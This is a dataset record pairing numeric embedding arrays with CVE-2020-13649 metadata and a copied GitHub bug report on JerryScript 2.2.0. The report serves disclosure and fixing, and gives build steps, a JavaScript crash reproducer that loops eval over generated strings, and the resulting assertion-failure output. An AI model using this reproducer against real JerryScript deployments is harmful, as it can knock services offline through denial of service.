-0.00035191685310564935, 0.00021244442905299366, -0.0038668455090373755, -0.0022904721554368734, 0.011625530198216438, 0.01642427407205105, 0.0021976393181830645, 0.00273499870672822, 0.008404944092035294, 0.015595920383930206, -0.03173455595970154, 0.001663850387558341, 0.007883652113378048, 0.029677949845790863, 0.0056520928628742695, 0.007023162674158812, 0.0071267071180045605, 0.010390139184892178, -0.0036847502924501896, 0.002865321934223175, 0.002153008244931698, -0.007576589472591877, 0.013475046493113041, -0.0015147823141887784, 0.0025207691360265017, 0.006037706043571234, 0.01206827163696289, -0.001186296809464693, -0.009875987656414509, 0.0036186962388455868, 0.004413131158798933, 0.015210306271910667, -0.0086477380245924, 0.0028046234510838985, 0.010761470533907413, 0.014546195045113564, 0.022194193676114082, -0.009890269488096237, 0.02309395931661129, -0.00037512509152293205, 0.004134632647037506, -0.006330486852675676, -0.0030849073082208633, -0.031191840767860413, 0.021780015900731087, -0.015581637620925903, 0.03384828940033913, -0.012732383795082569, -0.01648140326142311, 0.007133848033845425, 0.012818075716495514, -0.027921266853809357, -0.012760947458446026, 0.0076265763491392136, 0.0007600690005347133, -0.026835836470127106, -0.010861444287002087, 0.014624745585024357, -0.008290688507258892, -0.016852734610438347, 0.012025425210595131, -0.005273620598018169, 0.01893790252506733, 0.017752498388290405, -0.0015888700727373362, 0.01799529232084751, 0.027364270761609077, 0.022337013855576515, 0.008397802710533142, -0.023893749341368675, 0.0004650569171644747, -0.007747972849756479, -0.00830497033894062, -0.013575020246207714, 0.007226680871099234, 0.02036610059440136, -0.005966296419501305, 0.011961156502366066, -0.010018807835876942, 0.012646691873669624, -0.009890269488096237, -0.00546999741345644, -0.006344768684357405, 0.011818337254226208, 0.01942349039018154, 0.00024948830832727253, -0.010097358375787735, -0.005195069592446089, 0.01773821748793125, -0.016409993171691895, -0.016752760857343674, -0.011039968580007553, 0.01188974641263485, 0.01409631222486496, 0.004420272074639797, 0.029478002339601517, 0.01950918138027191, 0.0015406684251502156, 0.0229225754737854, 0.0077836778946220875, -0.01191116962581873, 0.02646450512111187, 0.02729286067187786, 0.01161124836653471, 0.015753021463751793, 0.016495684161782265, -0.019751975312829018, 0.003656186396256089, 0.000042092782678082585, -0.00704815611243248, 0.018880775198340416, -0.00021199810726102442, -0.005409299395978451, -0.01076861098408699, -0.0013112641172483563, 0.007883652113378048, 0.0007743510068394244, -0.0024207953829318285, -0.004841590765863657, -0.02625027485191822, 0.022636935114860535, 0.020208999514579773, 0.0035562124103307724, -0.008919095620512962, -0.015210306271910667, 0.021565787494182587, -0.00445240642875433, -0.026835836470127106, 0.026564478874206543, -0.008212137036025524, 0.010968559421598911, 0.006423319689929485, 0.0010631147306412458, 0.011097096838057041, 0.013353649526834488, 0.0013621436664834619, -0.008983364328742027, 0.01782390847802162, 0.0017950660549104214, -0.012103976681828499, -0.00767656322568655, 0.00010806325008161366, -0.018623698502779007, -0.011554120108485222, 0.016352863982319832, 0.00393468514084816, -0.001380888745188713, -0.007605153135955334, -0.014653309248387814, -0.0003302707336843014, 0.014617604203522205, -0.0040953573770821095, 0.0036668977700173855, -0.01648140326142311, -0.007662281394004822, 0.002070886781439185, 0.005680656526237726, -0.03561925143003464, 0.014981795102357864, 0.0006529541569761932, 0.01950918138027191, -0.022679781541228294, -0.013032305054366589, 0.00625907676294446, 0.0030349204316735268, 0.012103976681828499, -0.0001144789785030298, -0.005930591374635696, -0.011032828129827976, -0.018195239827036858, -0.009461810812354088, -0.008197855204343796, 0.020437510684132576, 0.007540884427726269, 0.030020717531442642, -0.012610986828804016, 0.011089956387877464, 0.007912215776741505, -0.004973698873072863, -0.0023975870572030544, -0.0069410414434969425, 0.016681350767612457, -0.0021619345061481, -0.010233037173748016, 0.008861967362463474, 0.019052159041166306, -0.008654878474771976, -0.019923359155654907, -0.005384305492043495, 0.0049558463506400585, 0.01799529232084751, -0.015167460776865482, -0.015581637620925903, -0.0031009744852781296, -0.012282500974833965, 0.0077194091863930225, -0.007419487461447716, -0.005062961019575596, -0.0030027858447283506, -0.014460503123700619, 0.00524148577824235, 0.028549674898386, 0.0017611464718356729, 0.02447931095957756, -0.025093436241149902, 0.005037967581301928, -0.0009354695794172585, -0.030334921553730965, 0.007776536978781223, -0.003959678579121828, -0.008969082497060299, 0.0003795881930273026, -0.017695371061563492, -0.02832116186618805, 0.004191760439425707, 0.004609508439898491, 0.005584253463894129, -0.01629573665559292, 0.008069317787885666, 0.006362621206790209, -0.007669422309845686, -0.0005409299046732485, 0.002045893343165517, -0.008861967362463474, 0.007790818810462952, -0.002468996914103627, 0.0070981429889798164, 0.0037847242783755064, 0.019394926726818085, 0.02326534129679203, 0.005927020683884621, -0.011654093861579895, 0.00332413031719625, -0.0291923638433218, -0.007101713679730892, -0.013532173819839954, -0.01803813874721527, 0.019666284322738647, -0.035219356417655945, 0.009433246217668056, 0.014046325348317623, -0.0030974040273576975, 0.01426769606769085, 0.008969082497060299, 0.009011927992105484, 0.007376641500741243, 0.0015977963339537382, 0.0024939903523772955, 0.006937470752745867, -0.0021280148066580296, -0.010625791735947132, 0.003027779283002019, 0.009633193723857403, -0.006755375768989325, -0.022851165384054184, 0.04964415729045868, 0.009154748171567917, 0.009804577566683292, 0.017366886138916016, 0.007740831933915615, 0.012332487851381302, -0.0005735106533393264, -0.005248626694083214, 0.02062317542731762, -0.00046594953164458275, 0.008312110789120197, -0.00452024582773447, -0.0052343448624014854, -0.002235129475593567, -0.0070874313823878765, -0.01799529232084751, -0.0035490714944899082, 0.01061865035444498, -0.006973175797611475, -0.0046594953164458275, -0.02019471675157547, 0.005584253463894129, 0.022822601720690727, -0.007519461214542389, -0.010025948286056519, 0.015196024440228939, 0.0013175124768167734, -0.011489851400256157, -0.000419309944845736, -0.02435077168047428, 0.03079194389283657, -0.008033612743020058, -0.0181666761636734, 0.024622129276394844, 0.0030027858447283506, 0.003920402843505144, -0.0019405637867748737, 0.011147083714604378, 0.01773821748793125, 0.0013130493462085724, 0.0072088283486664295, 0.007712268270552158, -0.02088025212287903, 0.0011032827896997333, 0.019923359155654907, 0.00254576257430017, 0.0027974825352430344, 0.00927614513784647, 0.005544978193938732, 0.016924144700169563, -0.004106068518012762, -0.0030795515049248934, 0.00801933091133833, 0.009047633036971092, 0.014503348618745804, 0.015295998193323612, 0.0010461548808962107, -0.021337274461984634, -0.0030759810470044613, -0.014767564833164215, -0.012103976681828499, -0.020308973267674446, -0.01548166386783123, -0.013732122257351875, -0.01565304771065712, -0.010461549274623394, -0.011711222119629383, 0.026235993951559067, -0.031506042927503586, 0.021680042147636414, 0.014417656697332859, -0.013539315201342106, 0.008340675383806229, -0.010440126061439514, 0.007855087518692017, -0.003927543759346008, -0.01318940706551075, -0.011339890770614147, -0.001268418156541884, 0.001579943811520934, -0.0018423751462250948, 0.02603604644536972, 0.012461026199162006, -0.013575020246207714, -0.014046325348317623, -0.006305493414402008, -0.014838974922895432, 0.0030920482240617275, -0.00492014130577445, 0.031077584251761436, 0.02170860581099987, 0.005095095839351416, -0.012603845447301865, -0.0031009744852781296, 0.006484018173068762, -0.028592519462108612, -0.013346508145332336, -0.00046639583888463676, 0.0006056451238691807, 0.01573874056339264, 0.023836622014641762, 0.0071374187245965, -0.008733429946005344, 0.0012951968237757683, -0.0020226852502673864, 0.01457475870847702, 0.005494990851730108, 0.00019079829507973045, -0.009640335105359554, 0.02793554961681366, 0.013682135380804539, -0.010432984679937363, -0.014910385012626648, 0.009497514925897121, 0.004734475631266832, -0.0042595998384058475, -0.00858346838504076, -0.007294520270079374, 0.0017379381461068988, -0.012225373648107052, -0.007512320298701525, -0.006166243925690651, 0.009169030003249645, 0.022993983700871468, 0.0065125818364322186, -0.011054251343011856, 0.013403636403381824, 0.014838974922895432, 0.029820770025253296, 0.019751975312829018, 0.010304447263479233, -0.0033134189434349537, 0.010432984679937363, -0.027407115325331688, 0.006526864133775234, 0.010740047320723534, -0.014953231438994408, 0.008204996585845947, 0.00019503825751598924, 0.004638072568923235, -0.006837496999651194, 0.07380926609039307, -0.008369239047169685, -0.004759469069540501, -0.013560738414525986, 0.003347338642925024, 0.003841852070763707, -0.003352694446220994, -0.007455192506313324, -0.020765995606780052, 0.010825739242136478, 0.00862631481140852, 0.0145961819216609, 0.005155793856829405, -0.0016906291712075472, 0.00877627544105053, 0.011254198849201202, -0.003941826056689024, -0.004138203337788582, 0.010475831106305122, -0.006733952555805445, 0.008397802710533142, -0.009269003756344318, 0.026307404041290283, 0.013060868717730045, 0.009154748171567917, 0.007490897551178932, -0.0017718578455969691, 0.004559521563351154, 0.006619696971029043, 0.014110594056546688, 0.006184096448123455, 0.01061865035444498, 0.02110876329243183, 0.011411300860345364, -0.011247057467699051, -0.002158363815397024, -0.012932331301271915, 0.003331271465867758, 0.02309395931661129, 0.0013514321763068438, 0.012746665626764297, -0.01820952259004116, -0.01083288062363863, 0.05244342237710953, 0.009019069373607635, -0.02927805483341217, 0.005716361571103334, -0.011732645332813263, 0.01438195165246725, 0.010775752365589142, -0.029592258855700493, 0.022422704845666885, 0.009604630060493946, -0.02140868455171585, 0.015453100204467773, 0.022337013855576515, -0.005748495925217867, 0.02625027485191822, -0.009783155284821987, 0.004823738243430853, -0.024022286757826805, -0.03279142081737518, 0.02633596770465374 ]
51
CVE-2020-13649
2020-05-28T15:15:11.980000
parser/js/js-scanner.c in JerryScript 2.2.0 mishandles errors during certain out-of-memory conditions, as demonstrated by a scanner_reverse_info_list NULL pointer dereference and a scanner_scan_all assertion failure.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/commit/69f8e78c2f8d562bd6d8002b5488f1662ac30d24" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3786" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3788" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3788
[ "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision https://github.com/jerryscript-project/jerryscript/commit/6cd309b5252d15f3e3e6481c72a4d8fa7f9557a9 ###### Build platform Ubuntu 20.04 LTS (Linux 5.4.0-31-generic x86_64) ###### Build steps ```sh python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function main() { var v2 = [13.37,13.37]; var v4 = [1337,1337,1337]; var v5 = [parseFloat,parseFloat,v2]; var v8 = new Float64Array(63797); var v10 = "d".constructor; var v12 = [1337,1337,1337,1337]; var v13 = []; var v14 = {constructor:v12,a:v13}; var v15 = v14.a; var v18 = 0; v15.toString = v10; var v20 = new Int16Array(); do { var v25 = String.fromCharCode(1337,128); try { var v26 = eval(v25); } catch(v27) { } var v28 = v18 + 1; v18 = v28; v13[v28] = v20; } while (v18 < 1337); } main(); ``` ###### Output ``` $ build/bin/jerry test.js ICE: Assertion 'context_p->error == PARSER_ERR_NO_ERROR' failed at /tmp/jerryscript/jerry-core/parser/js/js-scanner.c(scanner_scan_all):3196. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ```
Assertion 'context_p->error == PARSER_ERR_NO_ERROR' failed at jerry-core/parser/js/js-scanner.c(scanner_scan_all):3196
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3788/comments
0
2020-05-23T17:56:43
2020-05-27T12:40:44Z
https://github.com/jerryscript-project/jerryscript/issues/3788
623,710,199
3,788
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Assertion 'context_p->error == PARSER_ERR_NO_ERROR' failed at jerry-core/parser/js/js-scanner.c(scanner_scan_all):3196 Issue date: --- start body --- ###### JerryScript revision https://github.com/jerryscript-project/jerryscript/commit/6cd309b5252d15f3e3e6481c72a4d8fa7f9557a9 ###### Build platform Ubuntu 20.04 LTS (Linux 5.4.0-31-generic x86_64) ###### Build steps ```sh python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function main() { var v2 = [13.37,13.37]; var v4 = [1337,1337,1337]; var v5 = [parseFloat,parseFloat,v2]; var v8 = new Float64Array(63797); var v10 = "d".constructor; var v12 = [1337,1337,1337,1337]; var v13 = []; var v14 = {constructor:v12,a:v13}; var v15 = v14.a; var v18 = 0; v15.toString = v10; var v20 = new Int16Array(); do { var v25 = String.fromCharCode(1337,128); try { var v26 = eval(v25); } catch(v27) { } var v28 = v18 + 1; v18 = v28; v13[v28] = v20; } while (v18 < 1337); } main(); ``` ###### Output ``` $ build/bin/jerry test.js ICE: Assertion 'context_p->error == PARSER_ERR_NO_ERROR' failed at /tmp/jerryscript/jerry-core/parser/js/js-scanner.c(scanner_scan_all):3196. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` --- end body ---
1,533
[ 0.005815338343381882, 0.027042971923947334, -0.002588869770988822, -0.0016856052679941058, 0.011997112073004246, -0.007907687686383724, -0.0031934892758727074, 0.036350443959236145, -0.04921967536211014, 0.02211807295680046, -0.002537568798288703, -0.004184698220342398, 0.02323203906416893, 0.009182884357869625, 0.0012816096423193812, 0.026178183034062386, -0.00960795022547245, 0.0030359216034412384, -0.02324669621884823, -0.017662212252616882, 0.013294295407831669, 0.019333159551024437, 0.0012403855798766017, 0.04321012645959854, -0.006408964283764362, -0.011264240369200706, 0.005284006241708994, -0.0026163526345044374, -0.029593365266919136, -0.034298405051231384, 0.011469445191323757, 0.00735070463269949, -0.008413368836045265, 0.007944331504404545, 0.04071836173534393, 0.017984675243496895, 0.02526942268013954, 0.02494695782661438, -0.018057962879538536, -0.020872190594673157, -0.007812414318323135, -0.0333310142159462, -0.027878446504473686, 0.03066335804760456, 0.0061707813292741776, 0.047959133982658386, 0.03681948408484459, 0.009454047307372093, -0.030370209366083145, 0.008523300290107727, 0.026779137551784515, 0.008523300290107727, 0.0192159004509449, -0.057457152754068375, 0.030780619010329247, -0.005991227459162474, 0.02452189289033413, -0.012319575995206833, 0.006474922876805067, 0.025606542825698853, -0.00741299893707037, -0.0051630823872983456, 0.0013411554973572493, 0.0055478401482105255, 0.02853802964091301, 0.07182144373655319, -0.02545996941626072, -0.0038732278626412153, 0.0026163526345044374, 0.012568752281367779, 0.003979494329541922, -0.015287707559764385, 0.024404633790254593, 0.053675536066293716, 0.014657437801361084, -0.024551207199692726, 0.014672094956040382, 0.028127621859312057, -0.01767686940729618, -0.03611592575907707, -0.010729243978857994, 0.01870289072394371, -0.037024687975645065, -0.014247029088437557, 0.009637265466153622, 0.01657756231725216, -0.010575341060757637, -0.07868112623691559, -0.0012413017684593797, -0.01990479975938797, -0.031396232545375824, 0.04502764716744423, -0.014356959611177444, -0.010597326792776585, 0.004005144815891981, 0.03168937936425209, -0.015287707559764385, -0.0006783645367249846, -0.029197614639997482, 0.0003460529260337353, -0.0009518173174001276, -0.006441943813115358, 0.0043019577860832214, 0.003640541108325124, 0.017281118780374527, 0.018981382250785828, 0.0018550818786025047, -0.00559547683224082, 0.04391368106007576, 0.12617121636867523, -0.024727096781134605, 0.0032356292940676212, -0.014767368324100971, -0.043004922568798065, 0.00025421491591259837, -0.007541251368820667, 0.011601361446082592, -0.023554502055048943, -0.014628122560679913, 0.025665173307061195, -0.05135966092348099, -0.024815041571855545, -0.009769181720912457, 0.0073690265417099, -0.0069586182944476604, 0.02570914477109909, 0.043708477169275284, -0.02459518052637577, 0.012334233149886131, -0.03582277521491051, -0.05270814523100853, -0.01785275898873806, 0.00779775669798255, -0.006467594299465418, 0.05235636606812477, -0.00632101995870471, -0.040689047425985336, 0.03901809826493263, -0.025049559772014618, -0.054203204810619354, -0.02537202462553978, -0.007053891662508249, 0.05097856745123863, -0.0015298699727281928, -0.009417403489351273, 0.0007800504681654274, -0.02288025990128517, 0.022792315110564232, -0.015566198155283928, -0.0028472072444856167, -0.007149165030568838, 0.014408260583877563, 0.009791168384253979, -0.005591812543570995, 0.03596935048699379, -0.0016443812055513263, -0.00387689215131104, 0.04602435231208801, 0.01410045474767685, 0.020564384758472443, -0.04620024189352989, -0.035148534923791885, 0.00003630005812738091, 0.007702483329921961, -0.037024687975645065, 0.0009600621415302157, -0.038226597011089325, 0.004400895442813635, 0.012986489571630955, 0.018043305724859238, -0.015185104683041573, 0.014437575824558735, 0.010736572556197643, 0.029080355539917946, -0.019113298505544662, -0.006229410879313946, -0.001887145102955401, 0.03731783479452133, -0.0021051743533462286, -0.005478217266499996, 0.022074101492762566, 0.015859346836805344, -0.005628455895930529, -0.003781618783250451, 0.009226856753230095, -0.03893015533685684, 0.013272309675812721, -0.04963008314371109, -0.008537957444787025, -0.03133760020136833, -0.001162518048658967, -0.007233445532619953, -0.0010333493119105697, -0.0026218490675091743, -0.0008739497279748321, 0.02588503435254097, -0.019934114068746567, -0.05118377134203911, -0.014913942664861679, -0.0196556244045496, 0.06718969345092773, -0.0014300162438303232, -0.027233518660068512, -0.02512284740805626, -0.004598770756274462, -0.03875426575541496, 0.005657770670950413, 0.015155790373682976, 0.030604729428887367, -0.00973253883421421, -0.012693340890109539, -0.024815041571855545, 0.03292060270905495, -0.0316307507455349, -0.02110671065747738, -0.006178109906613827, -0.00036002331762574613, 0.015874003991484642, -0.008318095467984676, -0.005661434959620237, 0.00521071907132864, -0.022763000801205635, -0.018395083025097847, 0.0015051355585455894, -0.043356698006391525, -0.031572118401527405, -0.02809830754995346, -0.008787133730947971, -0.02126794122159481, 0.025342708453536034, -0.003464651759713888, -0.016167152673006058, -0.000214479528949596, -0.007442313712090254, 0.02194218337535858, 0.005573490634560585, -0.02853802964091301, -0.009263500571250916, -0.004452196415513754, 0.003464651759713888, 0.003581911325454712, -0.023012176156044006, -0.06460998207330704, -0.03151348978281021, 0.004265314433723688, 0.014496205374598503, -0.031220341101288795, -0.05657770857214928, -0.009908427484333515, 0.016343042254447937, -0.020095346495509148, -0.021048080176115036, -0.018996039405465126, -0.004679386969655752, 0.012942517176270485, 0.004360587801784277, -0.009776510298252106, 0.02160506322979927, -0.00023440449149347842, -0.02110671065747738, -0.007592552341520786, 0.004668393637984991, -0.03306717798113823, 0.013448198325932026, 0.017413035035133362, 0.014840655028820038, -0.03016500547528267, -0.002629177877679467, -0.019670281559228897, -0.020300550386309624, 0.052590884268283844, -0.05989028885960579, -0.02699900045990944, 0.018307140097022057, -0.0003233797033317387, 0.005423252005130053, -0.005819002632051706, 0.005170410964637995, -0.022484509274363518, -0.007053891662508249, -0.00819350779056549, 0.01820453628897667, 0.006009549368172884, 0.01682673767209053, 0.020872190594673157, 0.012011770159006119, 0.03863700479269028, -0.024990931153297424, -0.002323203720152378, -0.025987636297941208, -0.017544953152537346, -0.04388436675071716, -0.0021564755588769913, -0.0015500240260735154, 0.0009005162864923477, 0.0051227742806077, 0.004338601604104042, -0.04329806938767433, -0.003545267740264535, 0.015698116272687912, -0.027863789349794388, -0.02296820469200611, -0.00879446230828762, 0.006826701574027538, -0.04801776632666588, -0.0051117814145982265, 0.014019838534295559, 0.021077394485473633, 0.007101528346538544, -0.03016500547528267, 0.046170927584171295, -0.033272381871938705, 0.008501313626766205, -0.006764407269656658, -0.019069325178861618, 0.014166412875056267, 0.03212910145521164, -0.03409320116043091, -0.023598473519086838, 0.01337491162121296, -0.03297923505306244, -0.05373416468501091, -0.05162349343299866, 0.027819816023111343, 0.05519990995526314, -0.009761853143572807, -0.033184438943862915, 0.03441566228866577, -0.03664359450340271, -0.006225746590644121, 0.029446791857481003, -0.030194321647286415, -0.039252616465091705, 0.0026896398048847914, -0.02450723573565483, -0.054789502173662186, -0.040630415081977844, 0.042154788970947266, 0.030282266438007355, -0.032422251999378204, -0.020623015239834785, -0.021561089903116226, -0.012869230471551418, 0.0026035273913294077, 0.0038072692696005106, -0.01827782392501831, 0.0021491467487066984, 0.025606542825698853, 0.025064218789339066, -0.010120960883796215, 0.0008922715205699205, 0.011264240369200706, 0.024580523371696472, 0.0011570214992389083, 0.03816796839237213, -0.05877632275223732, -0.043092865496873856, -0.0002581083099357784, 0.02896309643983841, 0.0006096577853895724, -0.013558129779994488, -0.048222970217466354, 0.013067105785012245, -0.006192767061293125, 0.01810193434357643, -0.014804012142121792, 0.01615249551832676, -0.0018981380853801966, -0.02452189289033413, -0.01870289072394371, -0.03212910145521164, 0.01268601231276989, -0.021649034693837166, -0.012759299017488956, -0.015874003991484642, -0.038988783955574036, 0.015830032527446747, 0.007563237566500902, -0.027292149141430855, 0.011601361446082592, -0.014488876797258854, -0.023085463792085648, 0.0409821942448616, -0.03966302424669266, 0.029285559430718422, 0.024990931153297424, -0.016533588990569115, 0.015683457255363464, 0.007533922791481018, 0.007966317236423492, -0.008669874630868435, 0.0341811440885067, -0.04705037549138069, -0.048633377999067307, -0.0059325979091227055, 0.026529962196946144, -0.023964909836649895, -0.020110003650188446, 0.009256171993911266, -0.02128259837627411, -0.016196468845009804, -0.03371210768818855, 0.017544953152537346, -0.03511922061443329, 0.009937742725014687, 0.036438390612602234, -0.00015184188669081777, -0.03573483228683472, -0.00806891918182373, 0.02296820469200611, 0.041861642152071, -0.003924529068171978, -0.013734018430113792, -0.0008565440075471997, 0.06091630831360817, 0.03658496215939522, 0.03837317228317261, -0.03816796839237213, -0.03423977270722389, 0.011051707901060581, -0.018922751769423485, -0.01333093922585249, 0.03910604119300842, -0.005001850426197052, -0.008274123072624207, -0.01777947135269642, -0.018922751769423485, 0.02811296470463276, -0.0004046826798003167, -0.003050579223781824, -0.041128769516944885, -0.007775770500302315, 0.00698426878079772, 0.05408594384789467, 0.01097109168767929, -0.039750970900058746, -0.048750635236501694, -0.021502461284399033, -0.01400518137961626, 0.01183588057756424, 0.039750970900058746, 0.009395417757332325, -0.025415996089577675, -0.028552688658237457, 0.01111033745110035, -0.009307472966611385, -0.05593278259038925, 0.027145573869347572, -0.01682673767209053, 0.00806891918182373, 0.008450012654066086, 0.040952879935503006, -0.017325090244412422, 0.007812414318323135, 0.0026768145617097616, 0.014965243637561798, -0.0252107921987772, -0.005544175859540701, 0.0010324332397431135, -0.007805085275322199, 0.003997816238552332, 0.002931487513706088, 0.005342635791748762, -0.012187658809125423, -0.03954576700925827, 0.018468370661139488, 0.03227567672729492, -0.01477469690144062, -0.0036313801538199186, -0.034122515469789505, 0.0021784615237265825, -0.010062330402433872, 0.01320635061711073, 0.02767324261367321, -0.02100410684943199, -0.017119886353611946, -0.006899988744407892, -0.015932634472846985, -0.006738756783306599, -0.009673908352851868, 0.012158344499766827, -0.0013072602450847626, -0.013616759330034256, 0.028332825750112534, 0.011674649082124233, -0.004943220876157284, 0.009629935957491398, 0.00005236026117927395, -0.018409742042422295, 0.02161972038447857, 0.024228744208812714, 0.0034023576881736517, -0.031161712482571602, -0.02922693081200123, 0.003486637957394123, 0.0010306010954082012, -0.03544168174266815, -0.02195684053003788, 0.01904001086950302, 0.010502053424715996, 0.012209645472466946, -0.046170927584171295, 0.039428506046533585, 0.03409320116043091, 0.003552596317604184, -0.015683457255363464, -0.029168300330638885, 0.05144760385155678, 0.0014703242341056466, -0.016372358426451683, 0.006544545758515596, -0.07838797569274902, -0.0010791538516059518, -0.012304918840527534, -0.012063071131706238, -0.016548246145248413, 0.003972165752202272, 0.006584853865206242, 0.03854906186461449, 0.008941036649048328, -0.028889808803796768, -0.02436066046357155, -0.019362473860383034, 0.035764146596193314, 0.05244431272149086, 0.013360254466533661, 0.024712439626455307, -0.012627381831407547, -0.01939179003238678, -0.02903638407588005, -0.02383299358189106, 0.022528480738401413, -0.019860828295350075, 0.05162349343299866, 0.005756708327680826, -0.003041418269276619, -0.024228744208812714, 0.039750970900058746, 0.005357293412089348, -0.006691120099276304, 0.020139319822192192, 0.02290957421064377, -0.037640299648046494, 0.0012083224719390273, -0.0043642520904541016, 0.008369396440684795, -0.01700262725353241, 0.00002476305417076219, 0.020124660804867744, 0.03989754617214203, -0.028904465958476067, -0.013821963220834732, -0.0032686085905879736, 0.006108487024903297, -0.0070428987964987755, -0.015566198155283928, -0.011806565336883068, 0.03717125952243805, 0.0013558130012825131, -0.01102239266037941, -0.004639078862965107, -0.009864455088973045, -0.002893011784180999, 0.00016363654867745936, -0.026529962196946144, -0.01499455887824297, -0.015786059200763702, 0.019186586141586304, -0.028684604912996292, 0.017706183716654778, 0.01111033745110035, -0.010260205715894699, 0.022059442475438118, -0.017325090244412422, -0.007849058136343956, 0.009461375884711742, -0.007383684162050486, -0.007958988659083843, -0.009336787275969982, -0.00973986741155386, 0.03441566228866577, -0.009761853143572807, -0.015243735164403915, 0.011095680296421051, 0.008362067863345146, -0.03253950923681259, 0.023100120946764946, -0.01581537537276745, 0.016724135726690292, -0.02938816137611866, -0.022176703438162804, -0.008831106126308441, -0.003345560049638152, -0.00022707576863467693, 0.00035406873212195933, -0.02912432886660099, -0.0062110889703035355, 0.0009967057267203927, 0.0418323278427124, -0.004016137681901455, 0.007856386713683605, 0.0014968907926231623, 0.03467949852347374, -0.011264240369200706, -0.038988783955574036, 0.025987636297941208, -0.006020542234182358, 0.002486267825588584, -0.008765147998929024, 0.0341811440885067, -0.006123144645243883, 0.02436066046357155, 0.02716023102402687, -0.02526942268013954, -0.007731798104941845, -0.020623015239834785, -0.007134507410228252, 0.010018358007073402, -0.007398341316729784, 0.0166655071079731, 0.02894843928515911, -0.031073767691850662, -0.008728504180908203, -0.010546025820076466, -0.014547506347298622, 0.052327051758766174, -0.025767775252461433, 0.0010883146896958351, -0.01580071821808815, -0.046669282019138336, -0.010443423874676228, 0.010736572556197643, -0.019435761496424675, -0.005023836623877287, -0.006797386799007654, 0.04168575257062912, 0.027981048449873924, 0.006768071558326483, -0.005265684332698584, -0.03382936492562294, -0.0030212642159312963, 0.012370876967906952, -0.010773216374218464, -0.01473072450608015, -0.008574601262807846, -0.00028833927353844047, 0.013067105785012245, 0.0023836656473577023, 0.021487802267074585, 0.019523706287145615, -0.024463262408971786, -0.015097160823643208, 0.0209161639213562, 0.014371617697179317, -0.003428008174523711, 0.0010681607527658343, 0.03544168174266815, 0.050099119544029236, -0.012656697072088718, -0.011681977659463882, -0.03547099977731705, -0.00973986741155386, -0.001235805219039321, -0.005371950566768646, 0.024126142263412476, -0.030634043738245964, -0.02255779691040516, 0.015683457255363464, -0.008479327894747257, 0.022997519001364708, -0.008384054526686668, 0.01341155543923378, 0.01861494593322277, 0.008471998386085033, 0.004298293497413397, -0.01571277342736721, -0.0307513028383255, 0.0043789092451334, -0.006621497217565775, 0.016284413635730743, -0.02194218337535858, 0.005584483500570059, 0.01698797009885311, 0.016196468845009804, -0.017193173989653587, -0.0098278122022748, -0.015947291627526283, 0.005764037370681763, 0.016372358426451683, -0.01613783836364746, -0.0058080097660422325, 0.02861131727695465, 0.03151348978281021, 0.005819002632051706, -0.016885368153452873, -0.003041418269276619, 0.02323203906416893, -0.014210385270416737, -0.02264573983848095, -0.04030795395374298, -0.03201184421777725, 0.006859680637717247, -0.045408740639686584, -0.01255409512668848, 0.019611651077866554, 0.029608024284243584, 0.01046541053801775, -0.024302031844854355, 0.019347816705703735, 0.030809933319687843, -0.006280711852014065, 0.013389568775892258, -0.01571277342736721, -0.004342265892773867, -0.002019061939790845, -0.030868563801050186, -0.0036460375413298607, 0.0070612202398478985, -0.016621533781290054, 0.017295775935053825, -0.00029062951216474175, -0.012458821758627892, -0.04963008314371109, -0.02032986655831337, -0.00023589313786942512, -0.02878720685839653, 0.009256171993911266, 0.013389568775892258, 0.004452196415513754, 0.00815686397254467, -0.03749372437596321, -0.02913898602128029, 0.007493614684790373, 0.002968131098896265, -0.028127621859312057, 0.02082821913063526, -0.0036973385140299797, 0.0018138578161597252, 0.020476439967751503, 0.007783099077641964, 0.011476773768663406, -0.002656660508364439, -0.016680164262652397, -0.026002293452620506, 0.01820453628897667, -0.029358847066760063, -0.012568752281367779, 0.003409686265513301, -0.0196556244045496, -0.005284006241708994, 0.006196431815624237, 0.023510528728365898, 0.014760039746761322, -0.02213273011147976, -0.0013677221722900867, 0.01852700114250183, 0.022440535947680473, 